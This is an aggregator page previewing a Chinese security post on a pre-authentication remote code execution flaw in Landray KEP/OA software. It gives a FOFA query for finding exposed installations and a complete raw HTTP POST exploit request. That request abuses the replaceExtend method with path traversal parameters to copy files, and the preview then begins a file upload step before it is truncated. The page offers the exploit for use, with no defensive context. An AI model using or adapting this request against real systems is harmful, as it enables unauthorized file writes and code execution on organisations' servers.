注册    登录
专栏名称: HACK之道
HACK之道,专注于红队攻防、实战技巧、CTF比赛、安全开发、安全运维、安全架构等精华技术文章及渗透教程、安全工具的分享。
我也要提交微信公众号
今天看啥
微信公众号rss订阅, 微信rss, 稳定的RSS源
目录
今天看啥  ›  专栏  ›  HACK之道

蓝凌KEP前台RCE漏洞

HACK之道  · 公众号  ·  · 2024-07-18 09:00
    

文章预览

蓝凌KEP前台RCE漏洞 fofa app="Landray-OA系统" poc copy文件 POST   /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1 Host: xx.xx.xx.xx Accept: application/json, text/javascript, */*; q=0.01 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Length: 401 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51 Origin: http://www.baidu.com User-Agent: Mozilla/5.0 (Windows NT 10.0 ; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 X-Requested-With: XMLHttpRequest ------WebKitFormBoundaryL7ILSpOdIhIIvL51 Content-Disposition: form-data; name="method" replaceExtend ------WebKitFormBoundaryL7ILSpOdIhIIvL51 Content-Disposition: form-data; name="extendId" ../../../../resource/help/km/review/ ------WebKitFormBoundaryL7ILSpOdIhIIvL51 Content-Disposition: form-data; name="folderName" ../../../ekp/sys/common ------WebKitFormBoundaryL7ILSpOdIhIIvL51-- 上传文件 POST   /resource ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览
推荐文章
开平广播电视台  ·  大规模传播!有风险!微信紧急公告
8 小时前
前端早读课  ·  【第3433期】见证 Web 进化:Chrome 内置 AI
3 天前
开平广播电视台  ·  53岁香港艺人申请破产!出身豪门,传家族资产30亿港元
4 天前
开平广播电视台  ·  广东明确!这类车规定时间禁上高速
4 天前
西子湖畔  ·  惠州年底大扫除预约方式!
5 天前
储能与电力市场  ·  汇川技术:2024上半年PCS出货4GW,营收161.83亿,同比增长29.98%,净利润21.18亿
3 月前
安全圈  ·  【安全圈】速更新!GitLab发布更新修复CVSS满分漏洞
3 月前
储能与电力市场  ·  陕西:支持10万千瓦储能电站及8年储能设备、虚拟电厂设备改造升级,新能源公交车动力电池补贴6万元/辆
2 月前
美股投资网  ·  下一个英伟达是AVGO,博通凭ASIC能打破英伟达AI芯片垄断地位?
3 天前
关于   移动版   ·   Py中国   ·   RSS之家   ·   CodingPro   ·   Code   ·   Link之家   ·   卧龙AI搜索   ·   小百科
今天看啥 - 微信公众号rss订阅, 微信rss, 稳定的RSS源
© 2024 ~ 沪ICP备11025650号